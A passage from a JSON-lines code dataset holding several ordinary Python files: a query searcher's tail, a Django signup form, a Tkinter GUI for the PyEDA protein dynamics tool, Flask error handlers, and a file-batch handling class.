'\\\\') or \n ((item == 'and' or item[0] == '\\\\') and last_op == 'or') or \n (item == 'or' and (last_op == 'and' or last_op[0] == '\\\\'))):\n raise InvalidQueryException\n last_op = item\n else:\n full_list = get_full_list(item, index)\n if item == items[0]:\n result = full_list\n else:\n if last_op == 'or':\n result = merge_lists(result, full_list)\n elif last_op == 'and':\n result = intersect_lists(result, full_list)\n elif last_op[0] == '\\\\':\n result = intersect_with_range(result, full_list, last_op[1:])\n is_op = not is_op\n \n return [res[0] for res in result]\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"Invalid command line arguments. Example: python searcher.py \")\n sys.exit()\n index_file = sys.argv[1]\n index = pickle.load(open(index_file, 'rb'))\n \n query = input('Input query: ')\n while query.lower() != 'exit':\n try:\n res = process_query(index, query)\n for item in res:\n print(item)\n print('Matches: ' + str(len(res)))\n except InvalidQueryException:\n print('Invalid query. Try again...')\n query = input('Input query: ')","sub_path":"searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"353768674","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django import forms\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\nfrom .models import CustomUsuario\n\n\nclass CustomUsuarioCriarForm(UserCreationForm):\n class Meta:\n model = CustomUsuario\n fields = ('username', 'first_name', 'last_name', 'matricula')\n labels = {'username': 'Username/E-mail'}\n\n def save(self, commit=True):\n user = super().save(commit=False)\n user.set_password(self.cleaned_data[\"password1\"]) # recuperar os dados para criptografar a senha\n user.email = self.cleaned_data[\"username\"] # recuperar os dados referente ao e-mail\n\n if commit:\n user.save()\n data = {'usuario': user,}\n plain_text = render_to_string('accounts/emails/email.txt', data)\n html_email = render_to_string('accounts/emails/email.html', data)\n send_mail(\"Sigo - Seja Bem Vindo!\",\n plain_text,\n \"sigoorientacoes@gmail.com\",\n ['{0}'.format(user)],\n html_message=html_email\n )\n return user\n\n\nclass CustomUsuarioChangeForm(UserChangeForm):\n class Meta:\n model: CustomUsuario\n fields = ('first_name', 'last_name')\n","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"384461779","text":"\"\"\"\nInterface Module:\nThis module is part of the PyEDA program. It provides several classes to use\nPyEDA with a graphical Interface using Tkinter. It also acts as a main script\nto drive the EDA analyses.\n\nClasses:\n EDA_app -> It is the main window where all the other frames are projected.\n inherited from tkinter.Tk.\n StartPage -> Is the first frame the users sees after the execution of PyEDA.\n It leads to the loading data frame or the \"about us\" page.\n inherited from tkinter.Frame\n initial_root -> Acts as a loading data frame. Is where the user interacts\n with the program by entering the required data and options.\n inherited from tkinter.Frame\n waiting_window -> Is where the analysis is taking place. Incorporates the\n same steps that the PyEDA.py CLI. Leads to the plotting frame.\n inherited from tkinter.Frame\n plot_window -> It shows buttons to the different ploting capabilities of\n the software. It integrates matplotlib in the Tkinter window.\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk\nimport os.path\nimport os\nimport sys\nfrom tkinter import filedialog\nfrom . import helper_module as mdl\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nimport Bio.PDB as pdb\nfrom . import edanalysis as eda\n\n\n# implement the default mpl key bindings\n\n\nTITLE_FONT = (\"Helvetica\", 18, \"bold\")\ntext_fornt = (\"Courier\", 14)\n###############################################################################\nclass EDA_app(tkinter.Tk):\n \"\"\"\n It is the Tk window. It has the title information and it keeps the app.data dictionary where the\n diferent frames can share data. It also have a method to switch between\n frames. This is useful to maintain a program-like expirience.\n\n Methods:\n show_frame -> It's the only method in this class and it is used to\n switch to a specific frame whereever frame the user is.\n\n Attributes:\n self.app_data -> It is the data Hub for the whole application. Is where\n the data is kept when switching from frame to frame\n self.title -> It sets the title of the application.\n self.frames -> It is a dictionary that contains the frame instances all\n preloaded from the begining. It is used by show_frame method to\n get redirection to specific frames.\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"Constructor\"\"\"\n tkinter.Tk.__init__(self, *args, **kwargs)\n self.app_data = {\"filename\": '',\n \"pdbid\": '',\n \"plot\": '',\n \"pdbfilename\": '',\n \"pathname\": '',\n \"atom\": '',\n \"mode\": '',\n \"pathplots\": '',\n \"RMSD_plot\": ''}\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n self.title(\"PyEDA: by JF Gilabert & D Mas\")\n #self.geometry(\"600x600\")\n container = tkinter.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for F in (StartPage, initial_root, waiting_window, About_EDA, \\\n plot_window):\n page_name = F.__name__\n frame = F(container, self)\n self.frames[page_name] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n\n self.show_frame(\"StartPage\")\n\n def show_frame(self, page_name):\n \"\"\"Show a frame for the given page name\"\"\"\n frame = self.frames[page_name]\n frame.tkraise()\n\n\n###############################################################################\nclass StartPage(tkinter.Frame):\n \"\"\"\n It is the Starting page. It has few information displayed about the program.\n it let the user go to the analysis or the \"about us\" page.\n\n Methods:\n No methods implemented\n\n Attributes:\n self.controller -> It is a reference to the main Tk window.\n \"\"\"\n\n def __init__(self, parent, controller):\n \"\"\"\n Frame Constructor. We use the controller atribute to refer to the\n Tk window that is \"controling\" this frame. This way it can acces\n to the main window methods.\n \"\"\"\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n title = tkinter.Label(self, text=\"Welcome to the ED Analyser.\",\n font=(\"Helvetica\", 25))\n title.grid(row=1, column=0, columnspan=3)\n path_to_img = os.path.dirname(os.path.realpath(__file__))\n photo = tkinter.PhotoImage(file=path_to_img+\"/image.gif\")\n w = tkinter.Label(self, image=photo)\n w.photo = photo\n w.grid(row=0, column=0, columnspan=3)\n subtitle = tkinter.Label(self, text=\"\"\"\n This Software is the result for a project of Structual Bioinformatics\n and Introduction to Python from the Master of Science in Bioinformatics\n at Universitat Pompeu Fabra. We use the Essential Dynamics approach\n in order to analyse the Normal Modes of NMR structures and Molecular\n Dynamics. The input format is pdb although it can be also retrieved\n automatically by the software.\n \"\"\", font=text_fornt, justify=tkinter.LEFT)\n subtitle2 = tkinter.Label(self, text=\"Authors: JF Gilabert & D Mas\",\\\n font=(\"Helvetica\", 22, \"bold\"))\n subtitle2.grid(row=2, column=0, columnspan=3)\n subtitle.grid(row=3, column=0, columnspan=3)\n\n\n button1 = tkinter.Button(self, text=\"Start the Analysis\",\n command=lambda: controller.show_frame(\"initial_root\"))\n button2 = tkinter.Button(self, text=\"About PyEDA\",\n command=lambda: controller.show_frame(\"About_EDA\"))\n button3 = tkinter.Button(self, text=\"Close App\", command=self.quit)\n button1.grid(row=5, column=0)\n button2.grid(row=5, column=1)\n button3.grid(row=5, column=2)\n\n\n\n################################################################################\n\nclass initial_root(tkinter.Frame):\n \"\"\"\n This is the initial page of the application where the files are loaded and\n where the options can be selected.\n\n Methods:\n select_a -> It shows a message with the atom chosen\n select_m -> It shows a message with the mode chosen\n check_uniprot_accession_code -> Checks if the code have len==4\n get_pdb -> pass on the pdb code and move the user to the waiting_window\n select_file -> pass on the pdb filename and move the user\n to the waiting_window\n\n Attributes:\n self.controller -> It is a reference to the main Tk window.\n self.entry_var -> to let the user place a pdb code\n self.labels -> to display the method chosen in the radio buttons\n self.m -> to pass on the mode chosen\n self.var -> to pass on the atoms chosen\n \"\"\"\n def __init__(self, parent, controller):\n \"\"\"\n Frame Constructor. We use the controller atribute to refer to the\n Tk window that is \"controling\" this frame. This way it can acces\n to the main window methods.\n There are diverse types of buttons used to load the data.\n \"\"\"\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n ### title\n title = tkinter.Label(self, text=\"Welcome to the ED Analyser.\",\n font=(\"Helvetica\", 25), justify= \"center\")\n title.grid(row=1, column=0, columnspan=5)\n ### photo\n path_to_img = os.path.dirname(os.path.realpath(__file__))\n photo = tkinter.PhotoImage(file=path_to_img+\"/image.gif\")\n w = tkinter.Label(self, image=photo)\n w.photo = photo\n w.grid(row=0, column=0, columnspan=5)\n ### subtitle\n subtitle = tkinter.Label(self, text=\"Enter a file or a pdb code:\", \\\n font=(\"Helvetica\", 20))\n subtitle2 = tkinter.Label(self, text=\"Parameters:\", \\\n font=(\"Helvetica\", 20))\n subtitle.grid(row=2, column=0, columnspan=2)\n subtitle2.grid(row=2, column=2, columnspan=3)\n ### pdb code entry\n self.entry_var = tkinter.StringVar()\n ### entry\n label = tkinter.Label(self, text=\"pdb code:\",\n font=(\"Helvetica\", 15))\n label.grid(row=3, column=0)\n self.entry = tkinter.Entry(self, bd=2, width=5, \\\n textvariable=self.entry_var)\n self.entry.grid(row=4, column=0)\n ### check button\n b = tkinter.Button(self, text=\"Check\",\n command=self.check_uniprot_accession_code)\n b.grid(row=5, column=0)\n ### get pdb button\n get = tkinter.Button(self, text=\"Get PDB\", command=self.get_pdb)\n get.grid(row=6, column=0, columnspan=2)\n ### add a file button\n add = tkinter.Button(self, text=\"Add a pdb file\", \\\n command=self.select_file)\n add.grid(row=4, column=1, rowspan=2)\n\n label4 = tkinter.Label(self, text=\"Go Back:\",\n font=(\"Helvetica\", 15))\n label4.grid(row=7, column=0, columnspan=2)\n ### choose atoms\n label2 = tkinter.Label(self, text=\"Mode:\",\n font=(\"Helvetica\", 15))\n label2.grid(row=3, column=2, columnspan=3)\n self.m = tkinter.StringVar()\n m1 = tkinter.Radiobutton( self, text=\"NMR\", variable = self.m, \\\n value = 'NMR', command = self.select_m)\n m2 = tkinter.Radiobutton( self, text=\"MD\", variable = self.m, \\\n value = 'MD', command = self.select_m )\n\n m1.grid( row=4, column=2)\n m2.grid( row=4, column=3, columnspan=2)\n\n self.label_m = tkinter.Label(self)\n self.label_m.grid(row=5, column=2, columnspan=3)\n\n ### choose mode\n label3 = tkinter.Label(self, text=\"Atoms:\",\n font=(\"Helvetica\", 15))\n label3.grid(row=6, column=2, columnspan=3)\n self.var = tkinter.StringVar()\n r1 = tkinter.Radiobutton( self, text=\"Only CA\", variable = self.var,\\\n value = 'CA', command = self.select_a)\n r2 = tkinter.Radiobutton( self, text=\"Backbone\", \\\n variable = self.var, value = 'Back', command = self.select_a )\n r3 = tkinter.Radiobutton( self, text=\"All\", variable = self.var, \\\n value = 'all', command = self.select_a )\n\n r1.grid( row=7, column=2)\n r2.grid( row=7, column=3)\n r3.grid( row=7, column=4)\n\n self.label_a = tkinter.Label(self)\n self.label_a.grid(row=8, column=2, columnspan=3)\n\n ### start page button\n button = tkinter.Button(self, text=\"Start page\",\n command=lambda: controller.show_frame(\"StartPage\"))\n button.grid( row=8, column=0)\n ### close button\n close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n close_button.grid( row=8, column=1)\n ### Weighting loop\n i=0\n while (i<4):\n self.grid_columnconfigure(i, weight=1)\n i+=1\n def select_m(self):\n \"\"\"displays a message with the option chosen\"\"\"\n selection = \"You selected the option %s\" %self.m.get()\n self.label_m.config(text=selection)\n self.controller.app_data[\"mode\"] = self.m.get()\n def select_a(self):\n \"\"\"displays a message with the option chosen\"\"\"\n selection = \"You selected the option %s\" %self.var.get()\n self.label_a.config(text=selection)\n self.controller.app_data[\"atom\"] = self.var.get()\n\n def check_uniprot_accession_code(self):\n \"\"\" uses a function to check weather the code in 4 chars long\"\"\"\n if mdl.pdb_code_check(self.entry_var.get()):\n self.entry[\"foreground\"] = \"green\"\n else:\n sys.stderr.write(\"%s is not a uniprotaccession code format\\n\" \\\n %self.entry_var.get())\n self.entry[\"foreground\"] = \"red\"\n def get_pdb(self):\n \"\"\"gets the pdb code and stores the info, then move on to waiting\"\"\"\n interface_code = str(self.entry_var.get())\n if mdl.pdb_code_check(interface_code):\n self.controller.app_data[\"pdbid\"] = interface_code\n self.controller.app_data[\"pdbfilename\"] = 'pdb'+interface_code+'.ent'\n self.controller.app_data[\"pathname\"] = 'pdbfiles/'\n self.controller.app_data[\"pathplots\"] = 'plots/'\n if not os.path.exists(self.controller.app_data[\"pathname\"]):\n os.mkdir(self.controller.app_data[\"pathname\"])\n if not os.path.exists(self.controller.app_data[\"pathplots\"]):\n os.mkdir(self.controller.app_data[\"pathplots\"])\n self.controller.show_frame(\"waiting_window\")\n\n else:\n sys.stderr.write(\"%s is not a uniprotaccession code format\\n\" \\\n %self.entry_var.get())\n self.entry[\"foreground\"] = \"red\"\n\n def select_file(self):\n \"\"\"gets the pdb file name and stores the info, then move on to waiting\"\"\"\n filename = filedialog.askopenfilename()\n if not (filename.endswith('pdb') or filename.endswith('ent')):\n raise ValueError('Your input file is not a valid PDB file, \\\nplease use a pdb or ent file')\n path_name,pdb_file = os.path.split(filename)\n sys.stderr.write(\"Reading the structure from {}.\\n\".format(filename))\n self.controller.app_data[\"pathname\"] = path_name+'/'\n self.controller.app_data[\"pathplots\"] = path_name+'/plots/'\n self.controller.app_data[\"pdbfilename\"] = pdb_file\n if pdb_file.endswith('pdb'):\n pdb_id = pdb_file[:4]\n elif pdb_file.endswith('ent'):\n pdb_id = pdb_file[3:7]\n else:\n raise ValueError('Your input file is not a valid PDB file, \\\nplease use a pdb or ent file')\n self.controller.app_data[\"pdbid\"] = pdb_id\n self.controller.app_data[\"atom\"] = self.var\n self.controller.show_frame(\"waiting_window\")\n\n\n################################################################################\n\nclass About_EDA(tkinter.Frame):\n \"\"\"\n It is a information page that contains an explanation of the software\n features.\n\n Methods:\n\n Attributes:\n\n \"\"\"\n def __init__(self, parent, controller):\n \"\"\" Constructor \"\"\"\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n label1 = tkinter.Label(self, text=\"Help and Documentation\", font=TITLE_FONT)\n label2 = tkinter.Label(self, text=\"\"\"\n PyEDA is a python based software that performs a Normal Mode Analysis\n using an Essential Dynamics approach.\n \"\"\", font=text_fornt, justify=tkinter.LEFT)\n label3 = tkinter.Label(self, text=\"\"\"\n You can perform the analysis from a pdb file or you can introduce the\n desired pdb code and the program will retrieve the pdb file for you if\n you have internet connection.\n \"\"\", font=text_fornt, justify=tkinter.LEFT)\n label4 = tkinter.Label(self, text=\"\"\"\n The Program will output a set of files and plots. First, it will\n generate a superimposed pdb files with all the NMR models or MD frames.\n After that it will calculate the covariance matrix of the coordinates\n and will output a plot of the eigenvalues derived from the\n diagonalitzation of the matrix. Finally, it will output a pdb file\n with the moved coordinates.\n \"\"\", font=text_fornt, justify=tkinter.LEFT)\n label1.grid(row=0,column=0,columnspan=3)\n label2.grid(row=1,column=0,columnspan=3)\n label3.grid(row=2,column=0,columnspan=3)\n label4.grid(row=3,column=0,columnspan=3)\n\n button = tkinter.Button(self, text=\"Go to the start page\",\n command=lambda: controller.show_frame(\"StartPage\"))\n button.grid(row=4,column=0)\n\n button1 = tkinter.Button(self, text=\"Start the Analysis\",\n command=lambda: controller.show_frame(\"initial_root\"))\n button1.grid(row=4,column=1)\n\n close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n close_button.grid(row=4,column=2)\n ### Weighting loop\n i=0\n while (i<4):\n self.grid_rowconfigure(i, weight=1)\n i+=1\n################################################################################\n\nclass waiting_window(tkinter.Frame):\n \"\"\"\n It is the window where the proper analysis is taking place. The user hits\n the button and the analysis follows.\n\n Methods:\n analysis -> It is the method where all the computations are located. It\n starts when the user hit the button analysis.\n\n Attributes:\n\n \"\"\"\n def __init__(self, parent, controller):\n \"\"\"Constructor\"\"\"\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n ### title\n title = tkinter.Label(self, text=\"Waiting Room.\",\n font=TITLE_FONT)\n title.pack(side=tkinter.TOP)\n subtitle = tkinter.Label(self, text=\"\"\"\n Please, hit the button Analysis to start the computations.\n Have a coffe meanwhile your data is being processed.\n \"\"\", font=text_fornt)\n subtitle.pack(side=tkinter.TOP)\n ### analysis\n analysis_button = tkinter.Button(self, text=\"Analysis\",\\\n command=self.analysis)\n analysis_button.pack()\n\n\n ### add a closing button\n close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n close_button.pack()\n\n def analysis(self):\n \"\"\"\n Basically it contains all the computations needed to perform the EDA.\n It contain the same steps used in the main CLI.\n It also generate the plots at the end. When the plots are generated\n move the software to the plot_window.\n \"\"\"\n pdb_id = self.controller.app_data[\"pdbid\"]\n pathname = self.controller.app_data[\"pathname\"]\n pdbfile = self.controller.app_data[\"pdbfilename\"]\n atom = self.controller.app_data[\"atom\"]\n mode = self.controller.app_data[\"mode\"]\n\n sys.stderr.write(\"the selcted mode is: {} \".format(mode))\n pdbalignedfile = str(pdb_id) + 'align.pdb'\n pdb_superimp = str(pathname) + str(pdb_id) + 'superimp.pdb'\n\n if not os.path.exists(str(pathname)+str(pdbfile)):\n pdbobj = pdb.PDBList()\n pdbobj.retrieve_pdb_file(pdb_id, pdir=str(pathname))\n sys.stderr.write(\"The structure {} have been \\\nretrieved.\\n\".format(pdb_id))\n\n atom_list = []\n if atom == 'CA':\n atom_list = ['CA']\n elif atom == 'Back':\n atom_list = ['N', 'CA', 'C', 'O']\n else:\n atom_list = ['N', 'CA', 'C', 'O']\n\n if mode == 'MD':\n pdbref = pdb.PDBList()\n ref_file = pdbref.retrieve_pdb_file(pdb_id, pdir=pathname)\n parser = pdb.PDBParser(QUIET=True)\n reference = parser.get_structure(pdb_id+'ref', ref_file)\n try:\n ED = eda.EDAnalysis(pdb_id, mode, atom_list, pathname+pdbfile,\n reference=reference)\n except (eda.WrongModeException, KeyError, ValueError):\n pass\n else:\n ED = eda.EDAnalysis(pdb_id, mode, atom_list, pathname+pdbfile)\n\n\n ED.superimpose_models()\n if mode == 'NMR':\n sys.stderr.write(\"Writting the superimposed file.\\n\")\n head = mdl.store_header_text(pathname+pdbfile)\n self.controller.app_data[\"head\"] = head\n io = pdb.PDBIO()\n io.set_structure(ED.structure)\n io.save(pdb_superimp)\n mdl.merge_the_header(pdb_superimp, head, pathname+pdbalignedfile)\n os.remove(pdb_superimp)\n\n\n sys.stderr.write(\"Calculating means and coordinates\\n\")\n ED.createcordsarray()\n sys.stderr.write(\"Calculating covariance matrix\\n\")\n sys.stderr.write(\"Calculating eigenvalues and eigenvectors\\n\")\n ED.cal_cov()\n sys.stderr.write(\"Plotting eigenvalues\\n\")\n self.controller.app_data[\"ED\"] = ED\n #pathplots = self.controller.app_data[\"pathplots\"]\n n_plot = 30\n if ED.n < n_plot:\n n_plot = ED.n\n pathplots = pathname + 'plots/'\n plot = ED.plot_eig_wosv(n_plot)\n self.controller.app_data[\"plot\"] = plot\n\n\n RMSD_plot = ED.RMSD_res_plot(4, pathplots, origin='interface')\n self.controller.app_data[\"RMSD_plot\"] = RMSD_plot\n self.controller.show_frame(\"plot_window\")\n\n\n################################################################################\n\nclass plot_window(tkinter.Frame):\n \"\"\"\n This window integrated matplotlib package in a Tkinter interface. It uses\n the previously generated plots in the analysis method. The user can hit one\n or the other button to see the eigen_plot or the RMSD_plot.\n\n Methods:\n eigen_plot -> It displays the plot eigenvalue vs eigenindex. It uses the\n matplotlib integration in tkinter.\n RMSD_plot -> It shows the RMSD vs Residue plot. It uses the matplotlib\n integration in tkinter.\n\n Attributes:\n\n \"\"\"\n def __init__(self, parent, controller):\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n self.canvas = None\n grid_frame = tkinter.Frame(self)\n grid_frame.pack(side=tkinter.LEFT)\n label = tkinter.Label(grid_frame, text=\"Choose a plot to visualize:\",\n font=(\"Helvetica\", 15))\n label.grid(row=0, column=0)\n eigen_button = tkinter.Button(grid_frame, text=\"Eigen Vectors Plot\", command=self.eigen_plot)\n eigen_button.grid(row=0, column=1)\n\n RMSD_button = tkinter.Button(grid_frame, text=\"RMSD Plot\", command=self.RMSD_plot)\n RMSD_button.grid(row=0, column=2)\n ### generate a trajectory file\n ### trajectory\n ### eigv entry\n self.entry_evc = tkinter.IntVar()\n ### entry\n label2 = tkinter.Label(grid_frame, text=\"Choose a Eigen Vector for the trajectory:\",\n font=(\"Helvetica\", 15))\n label2.grid(row=1, column=0)\n self.entry = tkinter.Entry(grid_frame, bd=2, width=5, \\\n textvariable=self.entry_evc)\n self.entry.grid(row=1, column=1)\n\n label2 = tkinter.Label(grid_frame, text=\"ev index (1-10)\",\n font=(\"Helvetica\", 15))\n label2.grid(row=1, column=2)\n\n self.entry_time = tkinter.IntVar()\n ### entry\n label_time = tkinter.Label(grid_frame, text=\"Enter maximum span for the trajectory:\",\n font=(\"Helvetica\", 15))\n label_time.grid(row=2, column=0)\n self.entry_time = tkinter.Entry(grid_frame, bd=2, width=5, \\\n textvariable=self.entry_time)\n self.entry_time.grid(row=2, column=1)\n\n label3 = tkinter.Label(grid_frame, text=\"span (1-3)\",\n font=text_fornt)\n label3.grid(row=2, column=2)\n\n traj_but=tkinter.Button(grid_frame, text=\"Get the trajectory\", \\\n command=self.trajectory)\n traj_but.grid(row=3, column=0, columnspan=3)\n\n ### close button\n close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n close_button.pack(side=tkinter.BOTTOM)\n\n\n def eigen_plot(self):\n \"\"\"It generates a canvas to inttegrate the already generated plot\"\"\"\n if self.canvas != None:\n self.canvas.get_tk_widget().destroy()\n self.toolbar.destroy()\n plot = self.controller.app_data[\"plot\"]\n self.canvas = FigureCanvasTkAgg(plot, master=self)\n self.canvas.show()\n self.canvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n #\n self.toolbar = NavigationToolbar2TkAgg(self.canvas, self)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n def RMSD_plot(self):\n \"\"\"It generates a canvas to inttegrate the already generated plot\"\"\"\n if self.canvas != None:\n self.canvas.get_tk_widget().destroy()\n self.toolbar.destroy()\n plot = self.controller.app_data[\"RMSD_plot\"]\n self.canvas = FigureCanvasTkAgg(plot, master=self)\n self.canvas.show()\n self.canvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n #\n self.toolbar = NavigationToolbar2TkAgg(self.canvas, self)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n def trajectory(self):\n ED = self.controller.app_data[\"ED\"]\n pathname = self.controller.app_data[\"pathname\"]\n head = self.controller.app_data[\"head\"]\n evc = int(self.entry_evc.get())\n time = int(self.entry_time.get())\n ### generating the new trajectory\n sys.stderr.write(\"Generating eigenvector trajectories\\n\")\n moved = ED.move_structure(time, evc, pathname)\n new_moved = moved[:-5]+'.pdb'\n mdl.merge_the_header(moved, head, new_moved)\n os.remove(moved)\n sys.stderr.write(\"Done!\\n\")\n\n################################################################################\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n app = EDA_app()\n app.mainloop()\n","sub_path":"PyEDA/build/lib/PyEDA/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":25756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"630114106","text":"from flask import jsonify\nfrom app import app\n\n@app.errorhandler(400)\ndef handle_empty_data(error):\n response = jsonify({\n 'message': 'You either submitted empty data or incorrect data.',\n 'type': 'error'})\n response.status_code=400\n return response\n\n@app.errorhandler(401)\ndef handle_empty_data(error):\n response.headers['WWW-Authenticate'] = 'Basic realm=\"Notes\"'\n response = jsonify({\n 'message': 'Access Denied. Please re-enter your credentials.',\n 'type': 'error'})\n response.status_code=401\n return response\n\n@app.errorhandler(404)\ndef handle_not_found(error):\n response = jsonify({\n 'message': 'Not found.',\n 'type': 'error'})\n response.status_code=404\n return response\n\nclass ValidationError(Exception):\n def __init__(self, field, message):\n self.field = field\n self.message = message\n\n@app.errorhandler(ValidationError)\ndef handle_validation_error(error):\n response = jsonify({\n 'message': error.message,\n 'type': 'validation',\n 'field': error.field })\n response.status_code=400\n return response\n","sub_path":"app/v0/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"597345180","text":"from collections import namedtuple\nfrom hashlib import md5, sha256\nfrom magic import from_file\nfrom os import access, chown, listdir, mkdir, rmdir, stat, R_OK, walk\nfrom os.path import dirname, exists, join, relpath, splitext, basename\nfrom mimetypes import guess_type, read_mime_types\nfrom re import compile as re_compile\nfrom shutil import move\n\nclass Item(object):\n \"\"\"\n This class holds the data for each regular file in a new batch\n \"\"\"\n \n root_path = \"\"\n filepath = \"\"\n sha256 = \"\"\n md5 = \"\"\n accession = \"\"\n mimetype = \"\"\n can_read = False\n has_technical_md = False\n \n def __init__(self, path, root):\n self.root_path = root\n self.filepath = join(root, path)\n self.set_readability(self.test_readability())\n\n def test_readability(self):\n if access(self.filepath, R_OK):\n return True\n else:\n return False\n\n def set_readability(self, readable_notice):\n self.can_read = readable_notice\n\n def read_file(self):\n with open(self.filepath,'r') as f:\n fileData=f.read()\n return fileData\n\n def read_file_binary(self):\n with open(self.filepath,'rb') as f:\n fileData=f.read()\n return fileData\n\n def find_md5_hash(self):\n return self.find_hash_of_file(md5)\n\n def find_sha256_hash(self):\n return self.find_hash_of_file(sha256)\n\n def find_hash_of_file(self, hash_type, blocksize=65536):\n def check():\n if hash_type.__name__ == sha256.__name__ or \\\n hash_type.__name__ == md5.__name__:\n return True\n else:\n return False\n assert check()\n hash = hash_type()\n afile = open(self.filepath,'rb')\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hash.update(buf)\n buf = afile.read(blocksize)\n return hash.hexdigest()\n\n def set_md5(self, hash_value):\n self.md5 = hash_value\n\n def set_sha256(self, hash_value):\n self.sha256 = hash_value\n\n def get_md5(self):\n return self.md5\n\n def get_sha256(self):\n return self.sha256\n\n def get_file_path(self):\n return self.filepath\n\n def set_file_path(self,new_file_path):\n self.file_path=new_file_path\n\n def find_file_accession(self):\n relative_path = relpath(self.filepath, self.root_path)\n accession, *tail = relative_path.split('/')\n return accession\n \n def set_accession(self, identifier):\n if re_compile('\\w{13}').match(identifier):\n self.accession = identifier\n else:\n raise ValueError(\"You did not pass a valid noid\")\n\n def find_file_name(self):\n return basename(self.filepath)\n\n def find_file_name_no_extension(self):\n return splitext(basename(self.filepath))[0]\n \n def get_accession(self):\n return self.accession\n\n def find_file_extension(self):\n filename = basename(self.filepath)\n return splitext(filename)[1] \n\n def set_file_extension(self, value):\n self.file_extension = value\n \n def get_file_extension(self):\n return self.file_extension\n\n def find_file_size(self):\n return stat(self.filepath).st_size\n\n def set_file_size(self, size_info):\n if isinstance(size_info, int):\n self.file_size = size_info\n else:\n raise ValueError(\"You did not pass an integer.\")\n\n def get_file_size(self):\n return self.file_size\n\n def find_file_mime_type_from_extension(self):\n try:\n return guess_type(self.filepath)[0]\n except Exception as e:\n return (False,e)\n\n def find_file_mime_type_from_magic_numbers(self):\n try:\n return from_file(self.filepath, mime=True)\n except Exception as e:\n return (False,e)\n\n def find_file_mime_type(self):\n errors = []\n try:\n mimetype = self.find_file_mime_type_from_extension()\n except Exception as e:\n try:\n mimetype = self.find_file_mime_type_from_magic_number()\n except Exception as e:\n pass\n return mimetype\n\n def set_file_mime_type(self, mimetype_value):\n self.mimetype = mimetype_value\n\n def get_file_mime_type(self):\n return self.mimetype\n\n def find_technical_metadata(self):\n fits_filepath = join(self.filepath,'.fits.xml')\n if exists(fits_filepath):\n self.has_technical_md = True\n else:\n pass\n return True\n\n def find_a_group(self):\n print(\"testing...\")\n return True \n\n def get_destination_path(self, new_root_directory):\n path_sans_root = relpath(self.filepath, self.root_path)\n destination_full_path = join(new_root_directory, path_sans_root)\n self.destination = destination_full_path\n return True\n\n def set_destination_path(self, new_path):\n self.destination = new_path\n\n def move_into_new_location(self):\n try:\n move(self.filepath, self.destination)\n return (True,None)\n except Exception as e:\n error = e\n return (False,e)\n\n def copy_source_directory_tree_to_destination(self):\n destination_directories = dirname(self.destination).split('/')\n directory_tree = \"\"\n for f in destination_directories:\n directory_tree = join(directory_tree,f)\n if not exists(directory_tree):\n try:\n mkdir(directory_tree,0o740)\n except Exception as e:\n return (False,e)\n return (True,None)\n \n def clean_out_source_directory_tree(self):\n directory_tree = dirname(self.filepath)\n for src_dir, dirs, files in walk(directory_tree):\n try:\n rmdir(src_dir)\n return (True,None)\n except Exception as e:\n return (False,e)\n \n def find_object_identifier(self, control_type_data):\n object_pattern = control_type_data.get('object')\n assert object_pattern\n pattern_search = re_compile(object_pattern).search(self.filepath)\n if pattern_search:\n return namedtuple(\"data\", \"valid keys\")( \\\n True,\n pattern_search.groups() \\\n )\n else:\n return namedtuple(\"data\", \"valid keys\")( \\\n False,\n None \\\n )\n\n def classify_file_type(self, control_type_data):\n page_pattern = control_type_data.get('page_file')\n object_pattern = control_type_data.get('object_file')\n page_pattern_search = re_compile(page_pattern).search(self.filepath)\n object_pattern_search = re_compile(object_pattern). \\\n search(self.filepath)\n pagenumber = None\n if page_pattern_search:\n \n groups = page_pattern_search.groups()\n pagenumber = groups[-2]\n pagenumber = pagenumber.lstrip('0')\n tag = \"page_file\"\n elif object_pattern:\n tag = \"object_file\"\n else:\n tag = \"undefinable\"\n self.tag = tag\n if pagenumber:\n self.pagenumber = pagenumber\n\n def set_destination_ownership(self, user_name, group_name):\n uid = getpwnam(user_name).pw_uid\n gid = getgrnam(group_name).gr_gid\n try:\n chown(self.destination, uid, gid)\n return (True,None)\n except Exception as e:\n return 